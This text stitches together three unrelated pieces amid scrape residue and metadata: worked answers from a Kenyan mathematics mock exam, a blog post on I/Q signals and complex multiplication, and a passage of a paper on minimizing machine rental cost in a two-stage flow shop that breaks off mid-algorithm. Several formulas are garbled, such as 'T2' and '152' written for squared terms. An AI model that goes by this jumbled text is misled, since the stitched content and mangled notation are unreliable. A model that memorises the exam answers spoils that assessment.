= 97382400 ≈ 9.74 × 10⁷ (3 s.f.)
11. A solution was gently heated, its temperature readings taken at intervals of 1 minute and recorded as shown in the table below:
Time (min):       0   1    2    3     4     5
Temperature (ºC): 4   5.2  8.4  14.3  16.8  17.5
1. On the grid provided below, draw the time – temperature graph. (2mks)", null, "2. Use the graph to find the average rate of change in temperature between t = 1.8 and t = 3.4. 
(2mks)
(15.6 − 7.6)/(3.4 − 1.8) = 8/1.6
= 5 ºC/min
12. The shortest distance between two points A(40ºN, 20ºW) and B(θºS, 20ºW) on the surface of the earth is 8008 km. Given that the radius of the earth is 6370 km, determine the position of B. (Take π = 22/7). (3mks)
Let α = 40 + θ
(40 + θ)/360 × 2π × 6370 = 8008
∴ θ = 32º
∴ position of B: (32ºS, 20ºW)
13. Simplify √3/(√3 − √2). (2mks)
√3/(√3 − √2) × (√3 + √2)/(√3 + √2) = (3 + √6)/(3 − 2) = 3 + √6", null, "
14. The table below shows income tax rates in a certain year.
Monthly income in Kshs.     Tax rate in each shilling
Up to 9680                  10%
From 9681 to 18800          15%
From 18801 to 27920         20%
From 27921 to 37040         25%
Over 37040                  30%
In that year, a monthly personal tax relief of ksh. 1056 was allowed. Calculate the monthly income tax paid by an employee who earned a monthly salary of kshs. 32,500. (4mks)
first: 9680 × 10/100 = 968
second: 9120 × 15/100 = 1368
third: 9120 × 20/100 = 1824
last: 4580 × 25/100 = 1145
gross tax = 5305
income tax = 5305 − 1056 = sh. 4249
15. Three types of beverages are mixed in the ratio 1:3:5 respectively. Type A costs sh 26, type B costs sh 28 and type C sh 32, per packet. Find the cost of the mixture per packet. (3mks)
1 + 3 + 5 = 9
type A → 26 × 1 = sh 26
type B → 28 × 3 = sh 84
type C → 32 × 5 = sh 160
Total cost = sh 270
∴ cost per packet = sh 270/9 = sh 30
16. The gradient of a curve is given by dy/dx = x² − 4x + 3. The curve passes through the point (1, 0). Find the equation of the curve. (3mks)
y = ∫(x² − 4x + 3) dx = x³/3 − 2x² + 3x + c
At (1, 0): 1/3 − 2 + 3 + c = 0, so c = −4/3
∴ y = x³/3 − 2x² + 3x − 4/3", null, "
SECTION II (50MKS)

1. The hire purchase (H.P) price of an electronic device was ksh. 276,000. A deposit of ksh 60,000 was paid followed by 18 equal monthly installments.
1. Calculate the monthly installment. (2mks)
276,000 − 60,000 = 216,000
216,000/18 = sh 12,000
2. The cash price of the electronic device was 10% less than the hire purchase (H.P) price. Calculate the cash price. (2mks)
90/100 × 276,000 = sh 248,400
3. Madam Kanini decided to buy the electronic device in cash. She was allowed a 5% discount on the cash price, so she took a bank loan to buy the device. The bank charged compound interest on the loan at the rate of 20% p.a. The loan was repaid in 2 years.
1. Calculate the amount repaid to the bank by the end of the second year. (3mks)
95/100 × 248,400 = sh 235,980
Let principal P = sh 235,980, rate r = 20%, n = 2 yrs
A = P(1 + r/100)ⁿ
= 235,980 × (1 + 20/100)²
= sh 339,811.20
2. Express as a percentage of the hire purchase (HP) price, the difference between the amount repaid to the bank and the hire purchase price. (3mks)
339,811.20 − 276,000 = sh 63,811.20
63,811.20/276,000 × 100 = 23.12%
2. An examination involves a written test and a practical test. The probability that a candidate passes the written test is 6/11. If the candidate passes the written test, then the probability of passing the practical test is 3/5, otherwise it is 2/7.
1. Illustrate this information on a tree diagram. (2mks)", null, "2. Determine the probability that a candidate:
1. Passes both tests. (2mks)
p(wp) = 6/11 × 3/5 = 18/55
2. Passes the written test. (2mks)
p(wp) or p(wp'): 6/11 × 3/5 + 6/11 × 2/5 = 6/11
3. Determine the probability that the candidate:
1. Passes one test only. (2mks)
p(wp') or p(w'p): 6/11 × 2/5 + 5/11 × 2/7 = 1474/4235 = 134/385
2. Fails for not passing the written test. (2mks)
p(w'p') = 5/11 × 5/7 = 25/77
3. Construct triangle PQR with PQ = 7.2 cm, QR = 6 cm and ∠PQR = 48º. (3mks)
1. The locus L1, of points equidistant from P and Q, and the locus L2, of points equidistant from P and R, meet at M. Locate M, hence measure QM. 
(4mks)", null, "2.  A point X moves within triangle PQR such that QX ≥QM. Shade and label the locus of X. (3mks)\n4. Triangle PQR shown on the grid below has vertices P(5,5), Q(10,10) and R(10,15)", null, "", null, "1. Find the coordinates of the points P΄Q΄ and R΄ the images of P,Q and R respectively under transformation M whose matrix is [- 0.6  0.8] (3mks)\n[ 0.8    0.6]\nGiven that M is a reflection:\n1. Draw triangle P΄Q΄R΄ and the mirror line of the reflection. (2mks)\nline y = 2x drwan/identified\n2. Determine the equation of the mirror line of the reflection. (2mks)\ngradient of m = 2 units\nlet y = mx + c\ny = 2x + 0\n∴ y = 2x\n2. Triangle P˝Q˝R˝ is the image of triangle P΄Q΄R΄ under reflection N, where N is a reflection in the Y-axis.\n1. Determine triangle P˝Q˝R˝ (1mk)\nin the graph\n2. Determine a 2x2 matrix equivalent to the transformation NM. (2mks)", null, "5. In the figure below, PR is the diameter of the circle with centre O. Points P, Q, R and S are on the circumference of the circle. Angle PRQ = 72⁰ , QS = QP and line USV is a tangent to the circle at S.\nGiving reasons, calculate the size of:", null, "1. ∠QPR (2 marks)\n2. ∠PQS (2 marks)\n3. ∠OQS (2 marks)\n4. ∠RTS (2 marks)\n5. ∠RSV (2 marks)\n6. Three quantities R,S and T are such that R varies directly as S and inversely as the square of T.\n1. Given that R= 480 when S=150 and T=5, write an equation connecting R, S and T. (4mks)\nans = R = 80S\nT2\n\n2.\n1. Find the value of R when S=360 and T=1.5. (2mks)\nR = 80 x 360\n152\n= 12, 800\n2. Find the percentage change in R if s increase by 5% and T decreases by 20%. (4mks)\nAns = 64.06% increase\n7. For a C B C inservice training course for teachers, at least four (4) but not more that nine(9) teachers are to be chosen per school. The ratio of the number of male teachers to the number of female teachers must be less than 2:1 and there must be more males than females. If x and y represent the number of male teachers and female teachers respectively:\n1. Write down in their simplest form the inequalities that x and y must satisfy. (4mks)\n1. x + y ≥ 4 (at least 4 teachers)\n2. x + y ≤ 9 (not more than 9 teachers)\n3. x:y < 2:1\nx < 2y\n4. x>y (more males than females)\n2. On the gird provided below, represent the inequalities on the graph. (4mks)", null, "3. Use the graph to determine the composition of the training group of:\n1. The largest size. (1mk)\nintegral values (5,4)\n5 + 4 = 9 teachers\n2. The smallest size. (1mk)\nintegral values (3,2)\n3 + 2 = 5 teachers\n8. The equation of a curve is given by y=5x- ½ x2.", null, "1. On the grid provided below, draw the curve of y=5x- ½ x2 for 0≤x≤6. (3mks)\n x 0 1 2 3 4 5 6 y 0 4.5 8 10.5 12 12.5 12\n2. By integration, find the area bounded by the curve, the line x=6 and the x-axis. (3mks)", null, "3. On the same grid, draw the line y=2x. (1mk)\nLine drawn (must be straight)\n4. Determine the area bounded by the curve and the line y=2x. (3mks)\nA = 54 - Area of triangle\n= 54 - 1/2 x 6 x 12\n= 54 - 36\n= 18 sq.units\n\n• ✔ To read offline at any time.\n• ✔ To Print at your convenience\n• ✔ Share Easily with Friends / Students" ]
[ null, "data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIyNTAiIGhlaWdodD0iMTI5Ij48L3N2Zz4=", null, "data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSI1NCIgaGVpZ2h0PSI1NiI+PC9zdmc+", null, "data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSI1NCIgaGVpZ2h0PSI1NiI+PC9zdmc+", null, "data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIzNjQiIGhlaWdodD0iMTg5Ij48L3N2Zz4=", null, "data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSI0NyIgaGVpZ2h0PSIzOCI+PC9zdmc+", null, "data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSI1MzQiIGhlaWdodD0iNTQ0Ij48L3N2Zz4=", null, "data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIyNDUiIGhlaWdodD0iMTk5Ij48L3N2Zz4=", null, "data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIxODYiIGhlaWdodD0iMTMzIj48L3N2Zz4=", null, "data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIyNTAiIGhlaWdodD0iMTI5Ij48L3N2Zz4=", null, "data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIxNTgiIGhlaWdodD0iMTMxIj48L3N2Zz4=", null, "data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSI1NCIgaGVpZ2h0PSI1NiI+PC9zdmc+", null, "data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSI1NCIgaGVpZ2h0PSI1NiI+PC9zdmc+", null, "data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIyMDQiIGhlaWdodD0iMTA4Ij48L3N2Zz4=", null, "data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIxMzUiIGhlaWdodD0iMTExIj48L3N2Zz4=", null, "data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIxODkiIGhlaWdodD0iMTYwIj48L3N2Zz4=", null, "data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIzNjQiIGhlaWdodD0iMTg5Ij48L3N2Zz4=", null, "data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIzOTkiIGhlaWdodD0iMTAyIj48L3N2Zz4=", null, "data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSI0NyIgaGVpZ2h0PSIzOCI+PC9zdmc+", null, "data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSI2MTAiIGhlaWdodD0iMzM2Ij48L3N2Zz4=", null, "data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIyODkiIGhlaWdodD0iMTIwIj48L3N2Zz4=", null, "data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIyNjEiIGhlaWdodD0iMjE0Ij48L3N2Zz4=", null, "data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIyMDciIGhlaWdodD0iMTE4Ij48L3N2Zz4=", null, "data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSI0ODIiIGhlaWdodD0iNDYzIj48L3N2Zz4=", null, "data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSI1NzMiIGhlaWdodD0iNjAyIj48L3N2Zz4=", null, "data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIzOTgiIGhlaWdodD0iMTQ3Ij48L3N2Zz4=", null, "data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIyNjYiIGhlaWdodD0iMTgyIj48L3N2Zz4=", null, "data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIyNDUiIGhlaWdodD0iMTk5Ij48L3N2Zz4=", null, 
"data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSI1OTAiIGhlaWdodD0iMzA1Ij48L3N2Zz4=", null, "data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSI1NTYiIGhlaWdodD0iMjkyIj48L3N2Zz4=", null, "data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIyNDAiIGhlaWdodD0iMTYwIj48L3N2Zz4=", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8802682,"math_prob":0.998833,"size":17531,"snap":"2022-40-2023-06","text_gpt3_token_len":6087,"char_repetition_ratio":0.14805728,"word_repetition_ratio":0.6954201,"special_character_ratio":0.36729223,"punctuation_ratio":0.11958449,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9989191,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60],"im_url_duplicate_count":[null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-01-28T23:03:26Z\",\"WARC-Record-ID\":\"<urn:uuid:4b3adcbf-d797-4689-aed9-a82f874849be>\",\"Content-Length\":\"174223\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:9cf9cbf4-5d5d-4997-8cd7-45a3ab036308>\",\"WARC-Concurrent-To\":\"<urn:uuid:e447b801-c715-4181-9efd-cad33e985a09>\",\"WARC-IP-Address\":\"75.119.156.104\",\"WARC-Target-URI\":\"https://www.easyelimu.com/kenya-secondary-schools-pastpapers/mocks/2022/item/6126-mathematics-paper-2-questions-and-answers-lanjet-joint-mock-exams-2022\",\"WARC-Payload-Digest\":\"sha1:YLJQBKPEHATJAX7UI2RSRUKNBYEVZV3L\",\"WARC-Block-Digest\":\"sha1:2U4JWCHKB6ZPMRFSKIZEKEMJISJQKM43\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-06/CC-MAIN-2023-06_segments_1674764499695.59_warc_CC-MAIN-20230128220716-20230129010716-00165.warc.gz\"}"}
https://blog.shuningbian.net/2015/10/on-use-of-iq-signals.html
[ "## 2015-10-05\n\n### On the Use of I/Q Signals\n\n• All signals are complex, that is they have the form of $$x(t)=A\\exp(i\\omega t)$$. I/Q presentation of a signal fully captures this by storing the real component in the I, the in-phase signal, and the complex component in Q, the quadrature signal.\n• When we force signals to be purely real, e.g. $\\cos(\\omega t)$, we taking the real part of $exp(i\\omega t)$. Because we ignore the imaginary component, we lose information. Specifically, $\\cos(\\omega t)$ can be the real part of $\\exp(i\\omega t)$ or $\\exp(-i\\omega t)$. We don't know any more.\n• This ambiguity is present in the exponential form of $\\cos$: $$\\cos(\\omega t) = \\frac{\\exp(i \\omega t) + \\exp(-i\\omega t)}{2}$$. Note the presence of the two complex signals whose sum is always purely real as their imaginary parts cancel out. The real part of either complex signal will produce $\\cos(\\omega t)$.\n• This ambiguity is why when you multiply $\\cos(\\omega_0 t)$ and $\\cos(\\omega_1 t)$ you end up with $\\cos[(\\omega_0 + \\omega_1)t]$ and $\\cos[(\\omega_0 - \\omega_1)t]$. In other words, the frequency add as $\\pm \\omega_0 \\pm \\omega_1$, which produces 4 unique combinations that reduces to 2 because $\\cos$ is even.\n• The result of multiplying real cosines produces two peaks in the frequency spectrum.\n• On the other hand, preserving the complex nature of a signal by presenting it as $A\\exp(i\\omega t)$ means that multiplying two signals together produces a unique result: $$A_0\\exp(i\\omega_0 t) \\times A_1\\exp(i\\omega_1 t) = A_0A_1\\exp[i(\\omega_0 + \\omega_1)t]$$. This is because there is no ambiguity as we have not thrown away any information.\n• The result of multiplying complex signals produces one peak in the frequency spectrum.\n• This is one of the advantages of working with I/Q data, which preserves the complex nature of signals, and allows us to frequency shift a signal through multiplication without also generating an additional unwanted image of the signal.\nCheers,\nSteve" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.81999975,"math_prob":0.9992424,"size":1944,"snap":"2022-40-2023-06","text_gpt3_token_len":501,"char_repetition_ratio":0.16443299,"word_repetition_ratio":0.013071896,"special_character_ratio":0.27417696,"punctuation_ratio":0.09115282,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9991923,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-10-03T11:22:31Z\",\"WARC-Record-ID\":\"<urn:uuid:4075b2d6-ef63-4519-80c9-3e948eba8516>\",\"Content-Length\":\"88297\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:9c3e9a70-7fd8-4b1e-a255-25d63aeafa3c>\",\"WARC-Concurrent-To\":\"<urn:uuid:a330e864-1511-4330-9dd0-863f18073ae4>\",\"WARC-IP-Address\":\"172.253.115.121\",\"WARC-Target-URI\":\"https://blog.shuningbian.net/2015/10/on-use-of-iq-signals.html\",\"WARC-Payload-Digest\":\"sha1:CASKWR376HFZMZNI5JG6EVP7P7JOBOKF\",\"WARC-Block-Digest\":\"sha1:4T3JYJBDPHRLLUW5EU4MYQMKSAHJYFNQ\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-40/CC-MAIN-2022-40_segments_1664030337415.12_warc_CC-MAIN-20221003101805-20221003131805-00314.warc.gz\"}"}
https://1library.net/document/qo12dpjz-minimizing-specified-processing-associated-probabilities-including-interval-criteria.html
[ "# Minimizing Rental Cost under Specified Rental Policy in Two Stage Flow Shop, the Processing Time Associated with Probabilities Including Break-down Interval and Job – Block Criteria\n\n20\n\n## Full text\n\n(1)\n\n### Job – Block Criteria\n\nSameer Sharma (Corresponding author) Assistant Professor, Dept. of Mathematics,\n\nD.A.V. College, Jalandhar, Punjab, India\n\nTel: 011+91-9814819064, Email: [email protected]\n\nDeepak Gupta,\n\nProf. & Head, Dept. of Mathematics,\n\nMaharishi Markandeshwar University, Mullana, Ambala ,India Tel: 011+91-9896068604, Email: [email protected]\n\nAbstract\n\nIn real world scheduling applications, machines might not be available during certain time periods due to deterministic or stochastic causes. This paper is an attempt to study the two machine general flow shop problem in which the processing time of the jobs are associated with probabilities, following some restrictive renting policy including break-down interval and equivalent job-block criteria. The objective of the paper is to find an algorithm to minimize the rental cost of the machines under specified rental policy with break-down interval and job block criteria. The proposed method is very simple and easy to understand and also, provide an important tool for decision makers. The method is justified with the help of numerical example and a computer program.\n\nKeywords: Equivalent-job, Rental Policy, Makespan, Elapsed time, Idle time, Break-down interval, Johnson’s technique, Optimal sequence.\n\n1. Introduction\n\nThe classical scheduling literature commonly assumes that the machines are never unavailable during the process. This assumption might be justified in some cases but it does not apply if certain maintenance requirements, break-downs or other constraints that causes the machine not to be available for processing have to be considered. The temporal lack of machine availability is known as ‘break-down’.Before 1954, the concept of break-down of machines had not considered by any author. In 1954 Johnson had considered the effect of break-down of machines on the completion times of jobs in an optimal sequence. Later on many researchers such as Adiri , Akturk and Gorgulu , Smith , Szwarc, Chandramouli , Singh T.P. , Belwal and Mittal etc. have discussed the various concepts of break-down of machines. The functioning of machines for processing the jobs on them is assumed to be smooth with having no disturbance on the completion times of jobs. But there are feasible sequencing situations in flow shops where machines while processing the jobs get sudden break-down due to failure of a component of machines for a certain interval of time or the machines are supposed to stop their working for a certain interval of time due to some external imposed policy such as stop of flow of electric current to the machines may be a government policy due to shortage of electricity production. In\n\n(2)\n\neach case this may be well observed that working of machines is not continuous and is subject to break for a certain interval of time.\n\nIn flow-shop scheduling, the object is to obtain a sequence of jobs which when processed in a fixed order of machines, will optimize some well defined criteria. Various Researchers have done a lot of work in this direction. Johnson , Ignall and Scharge , Szwarch . Chandra Shekhran , Maggu & Das , Bagga P.C. , Singh T.P., Gupta Deepak etc. 
derived optimal algorithms for two, three or multi-stage flow shop problems, taking into account various constraints and criteria. Maggu & Das introduced the concept of equivalent-job blocking in the theory of scheduling. The concept is useful and significant in the sense that it creates a balance between the cost of providing priority service to some customers and the cost of serving non-priority customers; the decision maker may decide how much extra to charge the priority customer. Further, Maggu, Singh T.P. and Gupta Deepak associated probabilities with processing times and set-up times in their studies. Later, Singh T.P. and Gupta Deepak studied the n x 2 general flow shop problem to minimize rental cost under a pre-defined rental policy in which the probabilities have been associated with the processing time on each machine, including the job-block criteria. We have extended the study made by Singh T.P. and Gupta Deepak by introducing the concept of the break-down interval, and we have developed an algorithm minimizing the utilization time of the second machine, combined with Johnson's algorithm, in order to minimize the rental cost of the machines.

2. Practical Situation

Various practical situations occur in real life when one has got the assignments but does not have one's own machine, or does not have enough money, or does not want to take the risk of investing a huge amount of money to purchase a machine. Under such circumstances, the machine has to be taken on rent in order to complete the assignments. In his starting career, we find a medical practitioner does not buy expensive machines, say an X-ray machine, an ultrasound machine, a rotating triple head single positron emission computed tomography scanner, patient monitoring equipment, laboratory equipment etc., but instead takes them on rent. Rental of medical equipment is an affordable and quick solution for hospitals, nursing homes and physicians, which are presently constrained by the availability of limited funds due to the recent global economic recession. Renting enables saving working capital, gives the option of having the equipment, and allows upgradation to new technology.

Sometimes the priority of one job over another is preferred. It may be because of urgency or the demand of its relative importance; the job-block criteria then become important.

Another event which is mostly considered in the models is the break-down of machines. There may also be delays due to material, changes in release and tail dates, tool unavailability, failure of electric current, the shift pattern of the facility and fluctuations in processing times. All of these events complicate the scheduling problem in most cases. Hence the criterion of the break-down interval becomes significant.

3. Notations

S : Sequence of jobs 1, 2, 3, …, n
Mj : Machine j, j = 1, 2, …
Ai : Processing time of ith job on machine A.
Bi : Processing time of ith job on machine B.
A'i : Expected processing time of ith job on machine A.
B'i : Expected processing time of ith job on machine B.
pi : Probability associated to the processing time Ai of ith job on machine A.
qi : Probability associated to the processing time Bi of ith job on machine B.
β : Equivalent job for job-block.
L : Length of the break-down interval.
A''i : Expected processing time of ith job after the break-down effect on machine A.
B''i : Expected processing time of ith job after the break-down effect on machine B.
Si : Sequence obtained from Johnson's procedure to minimize rental cost.

Cj : Rental cost per unit time of machine j.

Ui : Utilization time of B (2nd machine) for each sequence Si.

t1(Si) : Completion time of last job of sequence Si on machine A.

t2(Si) : Completion time of last job of sequence Si on machine B.

R(Si) : Total rental cost for sequence Si of all machines.

CT(Si) : Completion time of 1st job of each sequence Si on machine A.

4. Assumptions

1. We assume the rental policy that all the machines are taken on rent as and when they are required and are returned as and when they are no longer required for processing. Under this policy the second machine is taken on rent at the time when the first job completes its processing on the first machine. Therefore the idle time of the second machine for the first job is zero.

2. Jobs are independent of each other.

3. The machine break-down interval is deterministic, i.e., the break-down intervals are well known in advance. This simplifies the problem by ignoring the stochastic cases where the break-down interval is random.

4. Pre-emption is not allowed, i.e., once a job is started on a machine, the process on that machine can't be stopped unless the job is completed.

7. Definitions

7.1 Definition 1:

An operation is defined as a specific job on a particular machine.

7.2 Definition 2:

Sum of idle time of M2 (for all jobs)

$= \max_{1 \le k \le n} P_k$, where $P_k = \sum_{i=1}^{k} A'_i - \sum_{i=1}^{k-1} B'_i$.

7.3 Definition 3:

Total elapsed time for a given sequence

= Sum of expected processing time on 2nd machine (M2) + Total idle time on M2

$= \sum_{i=1}^{n} B'_i + \max_{1 \le k \le n} P_k$, where $P_k = \sum_{i=1}^{k} A'_i - \sum_{i=1}^{k-1} B'_i$.

8. Theorems

Theorem 8.1:

Equivalent job block theorem due to Maggu & Das. In a two machine flow shop, in processing a schedule S = (α1, α2, …, αk-1, αk, αk+1, …, αn) of n jobs on two machines A & B in the order AB with no passing allowed, the job block (αk, αm) having processing times Aαk, Bαk, Aαm, Bαm is equivalent to the single job β (called equivalent job β). The processing times of the equivalent job β on the machines A & B, denoted respectively by Aβ and Bβ, are given by

Aβ = Aαk + Aαm - min(Bαk, Aαm)

Bβ = Bαk + Bαm - min(Bαk, Aαm)

Theorem 8.2:

Job i precedes job j in an optimal ordering, having minimum idle time on B, if

$\min(A'_i, B'_j) \le \min(A'_j, B'_i)$

where A'i = Expected processing time of ith job on A = Ai × pi and B'i = Expected processing time of ith job on B = Bi × qi.

Proof:

Let two sequences S1 and S2 of n jobs differ only in that jobs j and j+1 (j ≠ 1) are interchanged in their positions:

S1 = 1, 2, 3, 4, …, j-1, j, j+1, j+2, ……, n.

S2 = 1, 2, 3, 4, …, j-1, j+1, j, j+2, …., n.

By definition, the partial sums $P_k$ (as in Definition 7.3) for the sequences S1 & S2 will be the same for all positions not involving the interchanged jobs,

i.e. $P_k(S_1) = P_k(S_2)$ for k = 2, 3, …, j-1, j+2, …, n.

Now only $P_j(S_1)$, $P_{j+1}(S_1)$, $P_j(S_2)$, $P_{j+1}(S_2)$ are left to be determined:

$P_j(S_1) = \sum_{i=1}^{j} A'_i - \sum_{i=1}^{j-1} B'_i$ …..(1)

$P_{j+1}(S_1) = \sum_{i=1}^{j+1} A'_i - \sum_{i=1}^{j} B'_i$ …..(2)

$P_j(S_2) = \sum_{i=1}^{j-1} A'_i + A'_{j+1} - \sum_{i=1}^{j-1} B'_i$ …..(3)

$P_{j+1}(S_2) = \sum_{i=1}^{j+1} A'_i - \sum_{i=1}^{j-1} B'_i - B'_{j+1}$ ……(4)

On subtracting (1) from (3), we get

$P_j(S_2) - P_j(S_1) = A'_{j+1} - A'_j$ ……(5)

On subtracting (1) from (2), we get

$P_{j+1}(S_1) - P_j(S_1) = A'_{j+1} - B'_j$ …..(6)

On subtracting (3) from (4), we get

$P_{j+1}(S_2) - P_j(S_2) = A'_j - B'_{j+1}$ …..(7)

Sequence S1 will give minimum idle time in comparison to S2 if

$\max(P_j(S_1), P_{j+1}(S_1)) \le \max(P_j(S_2), P_{j+1}(S_2))$.

Writing $C = \sum_{i=1}^{j+1} A'_i - \sum_{i=1}^{j-1} B'_i$, equations (1)-(4) give $P_j(S_1) = C - A'_{j+1}$, $P_{j+1}(S_1) = C - B'_j$, $P_j(S_2) = C - A'_j$ and $P_{j+1}(S_2) = C - B'_{j+1}$ (using (5), (6) & (7)). On subtracting $C$ from both sides, the condition becomes

$\max(-A'_{j+1}, -B'_j) \le \max(-A'_j, -B'_{j+1})$, i.e. $-\min(A'_{j+1}, B'_j) \le -\min(A'_j, B'_{j+1})$, i.e.

$\min(A'_j, B'_{j+1}) \le \min(A'_{j+1}, B'_j)$ ….. (8)

Also, if

$\min(A'_j, B'_{j+1}) = \min(A'_{j+1}, B'_j)$ ….. (9)

then S1 & S2 are indifferent.

From (8) & (9), we conclude that sequence S1 will be preferable to S2 if

$\min(A'_j, B'_{j+1}) < \min(A'_{j+1}, B'_j)$.

If these conditions hold, then job j precedes job j+1 in an optimal order having minimum idle time.

9. Algorithm

Based on the equivalent job block theorem by Maggu & Das and by considering the effect of a break-down interval (a, b) on the different jobs, the algorithm which minimizes the total rental cost of the machines under the specified rental policy with the minimum makespan can be depicted as below:

Step 1: Define the expected processing times A'i & B'i on machines A & B respectively as follows:

A'i = Ai × pi

B'i = Bi × qi

Step 2: Define the expected processing times of the job block β = (k, m) on machines A & B using the equivalent job block given by Maggu & Das, i.e. find A'β and B'β as follows:

A'β = A'k + A'm - min(B'k, A'm)

B'β = B'k + B'm - min(B'k, A'm)

Step 3: Using Johnson's two machine algorithm, obtain the sequence S which minimizes the total elapsed time.

Step 4: Prepare a flow time table for the sequence obtained in step 3 and read the effect of the break-down interval (a, b) on the different jobs on the lines of Singh T.P.

Step 5: Form a reduced problem with processing times A''i and B''i. If the break-down interval (a, b) has an effect on job i, then

A''i = A'i + L

B''i = B'i + L, where L = b - a, the length of the break-down interval.

If the break-down interval (a, b) has no effect on the ith job, then

A''i = A'i

B''i = B'i

Step 6: Find the processing times A''β and B''β of the job-block β = (k, m) on machines A and B using the equivalent job-block β as in step 2.

Step 7: Now repeat the procedure to get the sequence S1, using Johnson's two machine algorithm as in step 3.

Step 8: Observe the processing time of the 1st job of S1 on the first machine A. Let it be α.

Step 9: Obtain all the jobs having processing time on A greater than α. Put these jobs one by one in the 1st position of the sequence S1 in the same order. Let these sequences be S2, S3, S4, ……, Sr.

Step 10: Prepare an in-out flow table only for those sequences Si (i = 1, 2, …, r) which have the job block β = (k, m) and evaluate the total completion time of the last job of each sequence, i.e.
